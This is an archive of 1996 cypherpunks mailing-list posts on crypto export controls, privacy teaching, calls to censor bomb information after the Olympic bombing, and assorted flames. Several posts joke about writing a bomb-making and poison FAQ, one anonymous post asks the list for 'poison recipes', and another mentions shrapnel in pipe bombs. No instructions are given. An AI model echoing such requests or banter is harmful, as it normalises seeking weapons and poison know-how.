> not US. Anyone have any suggestions on a way I can sneek some good privacy
> into the lesson plan.. 

How about someting sly and devious, like "Today, students, we're going
to look into issues of privacy on the internet and with communications
in general.  We will survey the science of cryptography, using a variety
of cryptographic techniques as illustrations of particular issues...

"For our next meeting, please read the first several chapters of Bruce
Schneier's 'Applied Cryptography' from the required reading list for the
class."

If you're stifled by any agency, scream at the top of your lungs.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 29 Jul 1996 01:05:08 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Rich Graves is accused of forgery and other net-abuse
Message-ID: <iu5RRD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Hmm, I though Rich Graves was a Nazi, but now the Nazis reject him too. :-)

Message-ID: <012317Z28071996@anon.penet.fi>
Path: ...!newsfeed.internetmci.com!swrinde!howland.reston.ans.net!EU.net!news.eunet.fi!anon.penet.fi
Newsgroups: alt.fan.ernst-zundel,alt.revisionism,news.groups,alt.internet.media-coverage,news.admin.net-abuse.misc,c2.chat,alt.cyberpunk,soc.culture.jewish
From: an572010@anon.penet.fi (Vyshinsky)
X-Anonymously-To: alt.fan.ernst-zundel,alt.revisionism,news.groups,alt.internet.media-coverage,news.admin.net-abuse.misc,c2.chat,alt.cyberpunk,soc.culture.jewish
Organization: Anonymous forwarding service
Reply-To: an572010@anon.penet.fi
Date: Sun, 28 Jul 1996 01:21:24 UTC
Subject: Re: Spammed by a Nazi obssessive
References: <schwartz-2507960756390001@cmh-p091.infinet.com> <joelr.3533.000B045C@winternet.com> <4t8nk8$3ic@Networking.Stanford.EDU>
Lines: 80


[multi-mailed to llurch@stanford.edu, postmaster@stanford.edu, and
postmaster@c2.net]

llurch@stanford.edu writes:

> joelr@winternet.com (Joel Rosenberg) writes:
> >In article <schwartz-2507960756390001@cmh-p091.infinet.com> schwartz@infinet.com writes:
> >
> >>Maybe someone should mention to Ingrid that this little crap works both
> >>ways. She may have been spammed, so are we.
> >>
> >>Sara
> >
> >I got the same spew, and sent back a message, with a copy to the root, that
> >I want no further email from these folks.  No big deal.
>
>
> Right. It's not.
>
> It doesn't work both ways. Neither way is acceptable. Fortunately, with
> the exceptions of Skippy, Giwer, and Marduk, whom nobody loves, nobody
> seems to be into continuing net abuse after they've been notified that
> it's wrong.

You, postmaster@c2.org, postmaster@stanford.edu and
news.admin.net-abuse.misc were notified about forged cancels by you
against others.  Did you stop since?

Your practice of posting to a lot of newsgroups with a followup-to
line for an "enemy" newsgroup, is the classic practice of trolling.
Most of the newsreaders wont see the rebuttals, and presume that
your post was unchallenged, so inspiring a rebuttal with the same
arguments that have already been made.  You've not stopped
regardless of the number of complaints.

Your practice of forging your e-mail address away from your true
e-mail address is also net abuse.  This is an obvious taking
advantage of sameer@c2.net, a net hero, the admin of your ISP,
that you are maliciously taking advantage of to avoid complaints
of your actual e-mail address, llurch@stanford.edu, whom you
work for.

Whoever "Skippy" is, she has not forged cancels since March 1996,
and has never done the other abuses you deal out in prolific
quantity.  Are you going to stop these three net abuses because
of yet another complaint?  You haven't before.




























--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Mon, 29 Jul 1996 03:35:05 +0800
To: Erle Greer <vagab0nd@sd.cybernex.net>
Subject: Re: Public vs. Private Munitions
In-Reply-To: <2.2.32.19960727192453.0069bd10@mail.sd.cybernex.net>
Message-ID: <Pine.BSI.3.93.960728100605.14138B-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hrm... that should foster communication. So lemme see if I understand your
point... everyone in the U.S needs to devise their own cryptosystem,
and then use it to communicate securely. To who? Since I can't publish
my system for fear the government will find it out and then restrict it,
noone else will know about it. I can have a good old time encrypting stuff
to myself, but that's about it. And the likelihood that I'm an expert
cryptographer in order to design a good system is pretty remote.

On Sat, 27 Jul 1996, Erle Greer wrote:

> Here's how I understand it:
>      The U.S. Government, concerned only with making America a safer place
> for us taxpayers to live in, wants to regulate domestic encryption in order
> to have access to the content of all transmissions.  Their theory is that
> any cryptosystem that is stronger than their cryptanalysis systems can be
> used in illegal transmissions and should be considered munitions.
>      Theoretically, the government should only be have the resources to
> control commercially-available, public encryption systems.  Who is to stop
> anyone from designing their own cryptosystem for personal use?  If the
> government intercepted a transmission from this private cryptosystem, and
> could not decrypt it, would they assume that it must be considered
> munitions?  Similarly, anyone could send uniformly-formatted random garble
> that could also be considered munitions, or at least waste the governments
> processing time.
>      Why are we so worried about government regulation?  Can't we just
> devise our own cryptosystems and just don't sell them or make them publicly
> available?
> 

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfufny/fy+vkqMxNAQEU5AQAuRmv5F2zTegRuwaQ+BL/nRkuR2oGHJKZ
i5y1M8DHH1SX4dM0idxV3VCqQuuEXqhjO2Q6HSKp+5H3UtDvQMihOD78WE9w67mj
ogsMFFHgmh19W79Z/Plv/G4VhDlBcx4rlYeTGaBGK7mRc6YV/qsQ1U4hQmdnyOmw
1L6EVE8wZYc=
=N4Dh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jul 1996 10:34:13 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Twenty Beautiful Women
Message-ID: <ae2005a310021004b85c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:19 PM 7/27/96, David Sternlight wrote:
>Here's another:
>
>Twenty beautiful women are to pass before you, one by one (or 20 handsome
>men). You see only one at a time. You cannot speak to them. After seeing
>any one, you must pick her or reject her. If you reject her, you cannot
>change your mind. If you pick her the exercise terminates.
>
>What is the optimal strategy for insuring you get the most beautiful woman
>possible under the circumstances?

Look at the first 1/e of them, or about the first 36.8% of them. In this
case, the first 7 of them. Then pick the first one after this group which
is better than any of the first group.

While there is some chance that one will get to #20 and find that none of
#8-20 were better than #1-7, this strategy is the best compromise between
"committing too early" and "waiting too long."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 29 Jul 1996 00:58:55 +0800
To: cypherpunks@toad.com
Subject: ABC
Message-ID: <Zc7RRD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I just heard something funny on ABC:

Interviewer: Is this the kind of bomb the militias like to use?

Interviewee: Yes, it's a pipe bomb. Of course, you can find out on
the Internet how to make these...

(Well, _I thought this was funny.)

I hereby volunteer Jim Bell to write the Cyperpunk bomb-making FAQ.
Or a more general chemical FAQ including common poisons.
Are you up to this task, Jim? :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 29 Jul 1996 01:01:38 +0800
To: cypherpunks@toad.com
Subject: Re: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
Message-ID: <v02140703ae2126c4bae3@[204.167.110.200]>
MIME-Version: 1.0
Content-Type: text/plain


>I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
>AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
>CAN TRACK YOU DOWN AND CLOSE THIS LIST.


Tips for reporting this 'clandestine' list to the FBI (and it's contributors)

1) Be sure to speak slowly and use small words when contacting the FBI.
2) If you can, be sure to work the words 'Pipe Bomb', 'Olympics', and/or
'TWA' into your sentences.
3) Remember to unsubscribe from the list before reporting it.
4) Try not to be belligerant when the talking with the FBI -  RE: tracking
down cpunks; they're laughing at you, already.
5) Try not to use the word 'inbred' in your report..they seem particullarly
sensitive to this...for some reason.
6) When meeting FBI in person, do not wear shiny objects or bright colors -
it distracts them.
7) When calling the FBI hotline, don't ask to speak to someone about
munition smuggling AND computers crimez - this will put the operator into
coma.
8) Be sure to ask for special agent 'Fox Mulder' and 'Dana Sculley' -
they're 'the best'

9)

10)...

_______
Warren Crossfield
Programmer/MacOS
"Buy a Pentium - so you can restart Windoze faster!"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 29 Jul 1996 03:53:48 +0800
To: cypherpunks@toad.com
Subject: Re: Internet blamed for pipe bombs
Message-ID: <2.2.32.19960728173842.00e15cbc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:30 AM 7/28/96 -0700, Lucky Green wrote:
>At 5:36 7/28/96, E. ALLEN SMITH wrote:
>
>>>   Across the country, latest figures from the U.S. Bureau of Alcohol,
>>>   Tobacco and Firearms show a 20 percent jump in pipe bomb incidents
>>>   between 1990 and 1994.
>>
>>[...]
>>
>>>   "We've been incredibly busy," said sheriff's bomb technician Judd
>>>   Holiday. "As crime in other categories is dropping, this is going up."
>
>The friendly Anarchist's Bookstore in San Francisco sells several books on
>building bombs. No Internet connection required. I would like offer another
>possible explanation for the increase in pipe bombings. The People are
>getting frustrated and a pipe bomb can be very useful device releasing
>one's frustration.

The local PBS station had a program on bomb detection and manufacture.  It
included a section with someone from the BATF explaining how Pipebombs work
and included slow motion video.  (It might have been an episode of NOVA.  I
came in in the middle.)  It even included information about how nails and
screws would be included for extra schrapnel.  (Maybe this is part of a plot
to remove funding from PBS once and for all...)

The media and government types who are blaming the Internet for pipebombs do
not get out enough.  I have seen good working descriptions in books since I
was a small child.  (Of course, I actually read books as a child.  And not
just the pablum they expect kids to read nowadays.)  Of course, since when
have government and media pronouncements have had anything to do with the
real world and/or truth...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 29 Jul 1996 03:49:27 +0800
To: cypherpunks@toad.com
Subject: [noise] Re: WaPo on Crypto-Genie
Message-ID: <2.2.32.19960728174203.00eb3568@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM 7/28/96 -0500, pjn@nworks.com wrote:
> In> Why does it sounds like Mr. Freeh and his friends are drinking out of
> In> a different bottle than the rest of us?
>
>     Why does it sound like they have been drinking period? <VBG>

I would guess it is either "Night Train", "Thunderbird", or one of those
French wines with the anti-freeze added for extra "kick".
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 29 Jul 1996 02:28:15 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <2.2.32.19960728133504.006b8dac@pop1.jmb.bah.com>
Message-ID: <XP8RRD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Charley Sparks <sparks@bah.com> writes:
> I occasionally get invited to teach at a local college.. some students are
> not US. Anyone have any suggestions on a way I can sneek some good privacy
> into the lesson plan.. the course is usually the Internet or networking in
> general.

Put useful stuff on a diskette, including PGP. Make as many copies of the
diskette as you have students. Hand it out in class. Assign homework projects
that would involve using PGP.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Mon, 29 Jul 1996 04:33:04 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Feinstein wants controls on Internet, Books
In-Reply-To: <ae20e54404021004a690@[205.199.118.202]>
Message-ID: <199607281817.LAA01221@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
> 
> 
> One of my senators, Senator Dianne Feinstein, is now arguing on CNN for
> controls on information put on the Internet, on censorship of books and
> articles describing how pipe bombs work, and for making it easier to get
> wiretaps against those suspected of committing thought crimes.
> 
> One or two more major incidents on top of the recent ones (World Trade
> Center, Oklahoma City, Dharan, TWA 800, and Olympic Village) and I suspect
> Congress will simply vote to repeal the Bill of Rights and just be done
> with this whole experiment in liberty.

Yes, but it won't be nearly that blatant.  In classic Orewllian
Doublespeak, it'll be called the "Terrorist Victims Bill
of Rights and Freedom of Information Act" and will merely
'abridge' the Bill of Rights with the "right" of the government
to investigate, wiretap, arrest and detain without trial
any suspected "terrorists" and "drug kingpins".

Cancelling the Bill of Rights would be too obvious, and probably
isn't the outright goal of any but a few extremists in government.
Rather, the majority of bureaucrats/elected officials want to
redefine the Rights to only apply to "good citizens", for somewhat
varying definitions of "good".  "They" won't suddenly stage a fascist
coup, instead it will (and has been) a long step-by-step process.
I don't think that most policy-makers are even aware
of what they're doing (DiFi certainly isn't) they're
just responding to preceived public pressure and trying
to stay elected.

The ugliest phrase in American lexicon: "There oughta be a law".



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jul 1996 11:24:47 +0800
To: cypherpunks@toad.com
Subject: Re: Public vs. Private Munitions
Message-ID: <ae20105d110210043d76@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:24 PM 7/27/96, Erle Greer wrote:

>     Theoretically, the government should only be have the resources to
>control commercially-available, public encryption systems.  Who is to stop

While I'm not exactly sure what you mean by a "commercially-available,
public encryption system," I think your point is incorrect.

(My confusion is that a commercially-available system is not necessarily a
"public" system, if by public one means public domain. If one means
"published specifications," still not the case. Confusing.)

Howver, the government cannot step in and "control" a
commercially-available product, by even the most liberal interpretations of
the commerce clause. "Tim's Pretty Flaky Snakeoil System," for example. I
can announce it, sell it, and the government is powerless to "control" it.
(Even if it were "public.")

If by "public" you mean an NBS or NIST standard, like DES, then I suppose
the government can in some sense "control" it. (Even this is iffy, IMO, as
I know of no rules saying DES implementations must be approved by NIST or
anyone else.)

>anyone from designing their own cryptosystem for personal use?  If the
>government intercepted a transmission from this private cryptosystem, and
>could not decrypt it, would they assume that it must be considered
>munitions?  Similarly, anyone could send uniformly-formatted random garble
>that could also be considered munitions, or at least waste the governments
>processing time.

Most of the cryptosystems are not under the "control" of the government,
even by the standards of your first definition. Period. RSA is not a
government-controlled system, though it is both "commercially-available"
AND "public" (in that the spec and algorithm are clearly published).

And the talk about "personal use" is misleading, IMO. It suggests that
government can and should regulate use for "business purposes" but not
personal uses. I disagree with this distinction.

>     Why are we so worried about government regulation?  Can't we just
>devise our own cryptosystems and just don't sell them or make them publicly
>available?

You mean the way public key systems in general and  RSA in particular were
invented and devised by non-government folks?


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Mon, 29 Jul 1996 04:34:38 +0800
To: m5@vail.tivoli.com (Mike McNally)
Subject: Re: Feinstein wants controls on Internet, Books
In-Reply-To: <31FBA2D3.C32@vail.tivoli.com>
Message-ID: <199607281835.LAA01418@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:
> 
> Either that, or Ms. Feinstein assumes (depressingly, perhaps correctly) 
> that her constituency is itself so collectively idiotic that they'll 
> accept such activity as good work done for their benefit.

Of course.  She'll have "done something" about the "terrorisim problem".
Never mind that it's completely ineffective and restrictive of
civil liberties.  Most Americans don't particularly care about
civil liberties as long as their day-to-day life runs smoothly.
Especially if it's other people's civil liberties that are
restricted.

The media hypes the terrorisim threat because it helps sell air
time and newspapers.  Fear sells.  How many of you were glued to the tube
for the dismal "coverage" of the Olympic Park bombing?  I was, and I
usually hate TV.  Fear is a powerful attention-getter, almost at good
as sex.  Since we're not allowed to have sex in the media, guess what
we get?

The articicially-generated climate of fear creates a reaction among
the populace.  Witness the countless studies that show that people's
fear of being a crime victim has increased markedly in the last 10 or
15 years while actual crime statistics have for the most part gone down.
The politicians have picked up on this reaction with a vengance, being
"tough on crime" is a sure way to get (re)elected.

 
> So infuriating, in fact, that I'll vent a bit more.  How effective does
> Ms. Feinstein imagine a ban on bomb-building information might be?  Those
> who've already learned can't be expected to forget, so there'll be a 
> period of time during which today's crop of crazed bombers work the
> urges out of their systems.

[..]

DiFi and crowd isn't thinking of how their information crackdown would
actually work.  They probably don't really care if it'll be effective or
not.  The point is to "do something" right now about the "terrible
problem".  That something just has to sound like it'll be effective; no
one will find out if it works or not for 10 or 15 years, which is an
eternity for politicians (and most constituents).


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 29 Jul 1996 02:28:41 +0800
To: cypherpunks@toad.com
Subject: Re: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
In-Reply-To: <v02140703ae2126c4bae3@[204.167.110.200]>
Message-ID: <Ls0RRD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:
>
> Tips for reporting this 'clandestine' list to the FBI (and it's contributors)
                                                               ^
> 1) Be sure to speak slowly and use small words when contacting the FBI.
...
> _______
> Warren Crossfield
> Programmer/MacOS
> "Buy a Pentium - so you can restart Windoze faster!"

11. When using an anonymous remailer, strip your signature.

12. Don't rely on a Mac spellchecker.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 28 Jul 1996 22:25:12 +0800
To: JDEWEY-L@VM.SC.EDU
Subject: War of Words
Message-ID: <199607281155.LAA10811@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, July 27/28, 1996, p. XVIII. 
 
 
   War of words over the facts 
 
   By Peter Aspden  
 
 
   It must be tough to return from a spell of duty as a war 
   correspondent to a gentle, civilised, country such as 
   Britain. One minute you are witnessing the most unspeakable 
   atrocities committed in the name of politics, religion or 
   just for the hell of it; the next, you are listening to 
   heated debate over the future of the rugby Five Nations 
   Championship. It does nothing for your sense of 
   perspective. 
 
   Martin Bell, who covered the Bosnian war with such 
   distinction for the BBC, left the stench of the Srebrenica 
   mass executions to breathe the irrelevant odours of 
   Euro-scepticism and National Lottery-mania over the media 
   airwaves. It shocked him to the core, as he revealed in a 
   recent speech: "I ask myself: is this my country? Is it 
   even my planet?" 
 
   Bell's exasperation has led him to question the model of 
   balanced, dispassionate, objective journalism which has 
   been the bedrock of BBC -- and indeed most serious 
   newspaper and broadcasting -- journalism. He now calls it 
   "bystander journalism". "What I believe in now is what I 
   prefer to call the journalism of attachment, a journalism 
   that cares as well as knows." 
 
   Predictably, this has set alarm bells ringing. 
   Traditionalists fussed over their hallowed dictum -- facts 
   are sacred, comment is free -- with scarcely a pause for 
   reflection. It is precisely when issues take on a tragic, 
   awful dimension, they argued, that one needs to stick to 
   the facts of the matter. There is no room for sentiment on 
   the front lines. 
 
   But Bell's point is well made. The trouble with facts, or 
   at least those which are given privilege by traditional 
   journalism, is that they are hard, cold, numbing. If, while 
   reporting on Srebrenica, one talks about diplomatic 
   initiatives, talks about talks, United Nations troop 
   movements, one soon loses one's audience. 
 
   It is a lesson which even academics, those ultimate 
   upholders of cool objectivity, have come to appreciate. I 
   remember the American philosopher Richard Rorty beginning 
   a lecture on human rights to Oxford University students 
   with a harrowing account of a Bosnian Moslem having his 
   penis bitten off. The atmosphere became electric, no mean 
   feat for the Sheldonian Theatre. 
 
   We probably would not hear of such incidents in a normal 
   news account from Bosnia; we certainly would not see 
   anything related to it, on grounds of poor taste. But the 
   sexual sadism which is a component of virtually every 
   ethnic cleansing campaign there has ever been is a fact, 
   too. Not a cold, hard fact, but one which has the power to 
   move people. Therein lies its strength. 
 
   It is not as if the media show any consistency here. On 
   certain occasions, they are only too willing to allow news 
   reports to emote. When we see an interview with a 
   distressed relative whose family has been wiped out or gone 
   missing, we are meant to feel for them. And the police 
   exploit that feeling: they hope that public compassion will 
   turn to solid leads. The facts here are heart-wrenching. 
 
   But, more importantly, they are facts with which we can 
   identify. It requires little imagination to see ourselves 
   in the wretched situation we watch on the small screen. We 
   know what it is like to lose a loved one, or we feel we 
   know. What we find difficult is to move from micro to 
   macro. 
 
   What happened at Srebrenica, like what happened at 
   Auschwitz and Belsen, is almost unimaginable. And faced 
   with the unimaginable, we go cold. This applies to news 
   reports as well as the self-defence mechanisms of our 
   fragile emotions. One cannot countenance sitting down after 
   dinner in front of the television to hear of such 
   brutalities, let alone see them. 
 
   But that is no excuse. The trouble with cold facts is that 
   they harden, while all the time we should be being 
   tenderised. And then we fall to that terrible disease of 
   fattened western sensibilities, "compassion fatigue". 
 
   We should listen to Martin Bell. He knows a thing or two 
   about human behaviour which most of us choose to exclude 
   from our worldview. We should have heard more from him on 
   the horrors of Bosnia, and less on the grotesquely 
   inadequate responses of our gentle, civilised countries as 
   they sought to respond to the unthinkable. 
 
   [End] 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 29 Jul 1996 05:18:51 +0800
To: cypherpunks@toad.com
Subject: your favorite poison recipes
Message-ID: <199607281911.MAA02693@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Please post your favorite poison recipes to this mlist.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Mon, 29 Jul 1996 03:53:50 +0800
To: cypherpunks@toad.com
Subject: Re: Feinstein wants controls on Internet, Books
In-Reply-To: <ae20e54404021004a690@[205.199.118.202]>
Message-ID: <31FBA2D3.C32@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> One of my senators, Senator Dianne Feinstein, is now arguing on CNN for
> controls on information put on the Internet, on censorship of books and
> articles describing how pipe bombs work ...

I can only assume that anybody who reaches adulthood without incidentally
learning how to make a bomb, or who at least becomes acquainted with
someone else who they can confidently assume knows how to help out in
a pinch, is merely an idiot.  It appears that Ms. Feinstein herself has
no idea how to make a bomb, and that therefore she assumes it's a monstrous
cabal of psychotic murderers that passes this sort of information around 
via illicit texts and, lately, the despicable Internet.

Who's never read a spy novel or muder mystery with (possibly bogus, though
at least vaguely accurate) bomb-building hints?  Who's grown up with
violent American television and film without absorbing at least a shred
of information regarding bombs?   Is it really possible that a marginally
intelligent person could find themselves needing to build a bomb but
have no idea how to proceed?

Either that, or Ms. Feinstein assumes (depressingly, perhaps correctly) 
that her constituency is itself so collectively idiotic that they'll 
accept such activity as good work done for their benefit.

I doubt the latter.  Ms. Feinstein has never in public speech given me
intuitive feelings that she's at all a devious, subtly manipulative person.
I think she's an honest idiot who turns the fortune of her political power
to causes she believes to be right.  It's infuriating.

So infuriating, in fact, that I'll vent a bit more.  How effective does
Ms. Feinstein imagine a ban on bomb-building information might be?  Those
who've already learned can't be expected to forget, so there'll be a 
period of time during which today's crop of crazed bombers work the
urges out of their systems.  There'll be the determined traffic in 
illegal dog-eared volumes traded secretly among those awful militia 
members in all the "scary" states between Lake Tahoe and the Potomac.
Given the rarity of bombings today, can anyone honestly expect that even
the most draconian crack-down on information will turn back the clock 
to the days before virtually every adolescent male knew the raw 
ingredients of gunpowder?

Finally, note that you'd better hurry and order your video copy of the 
old Star Trek episode "Arena"...


[ ... time to mellow out; I'm switching from coffee to beer. ]
______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sun, 28 Jul 1996 21:03:06 +0800
To: cypherpunks@toad.com
Subject: Re: "privatizing" phones?
Message-ID: <9607281026.AA29368@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sun Jul 28 12:24:57 1996
> Even if they did change the frequency the call was on, 
> it would be a simple matter to decode how the frequency
> change was negotiated, and "follow" the call (also easily
> accomplished with cellular calls).  Failing that, there is 
> a very limited range of frequencies allocated for cordless 
> fones, and simply re-scanning for the conversation is a 
> trivial inconvenience. //cerridwyn//
> 

Most of those systems do also change the order of the transmitted data, and 
that's not limited to a few possibilities. If it's digital, they usually 
encrypt it (only weak, but hey, you normally have to find the key real 
time!)

- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMfs/vhFhy5sz+bTpAQEcnwf9G+HAE57+cOydDLAoaetvywK5jFq8IdIW
POXECrmy53+lTe4n/Z763ytNTUJRYBXcUQrTyg4BiVgDoqt5vm+ZxlPKec64FxME
a/UM0wpBBANUmgZVWiojtm+lMuxUxfjXbYyV1hRkBfe+gZ0RF00kOhTsWRqEaUTX
UTpbPalsh+fVtCrhU4lkxk70epu8b6F6SiFw9+awP3mRImlu5SdRBduS6G1yTvSX
UetAkO60anp6wTIy5s5e+FuWFNmWVqZIGt72fKdqtQshx9xvikzpKGSOExidFTkA
Z8gWmk1mfU1PiD/8Yfe6VWJdHlFWbqGDGQmRcfwqi5awmDPeNs7arw==
=4IN4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Mon, 29 Jul 1996 03:51:02 +0800
To: cypherpunks@toad.com
Subject: Re: Feinstein wants controls on Internet, Books
In-Reply-To: <ae20e54404021004a690@[205.199.118.202]>
Message-ID: <31FBA3C0.6A7@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, me again; I can't resist the irony:

Timothy C. May wrote:
>
> One of my senators, Senator Dianne Feinstein, is now arguing on CNN for
> controls on information put on the Internet ...

There's a diagram of a pipe bomb on the CNN web site, in the story about
the horrible things.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sun, 28 Jul 1996 21:02:23 +0800
To: cypherpunks@toad.com
Subject: Re: Lynx...
Message-ID: <9607281031.AA29427@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sun Jul 28 12:28:37 1996
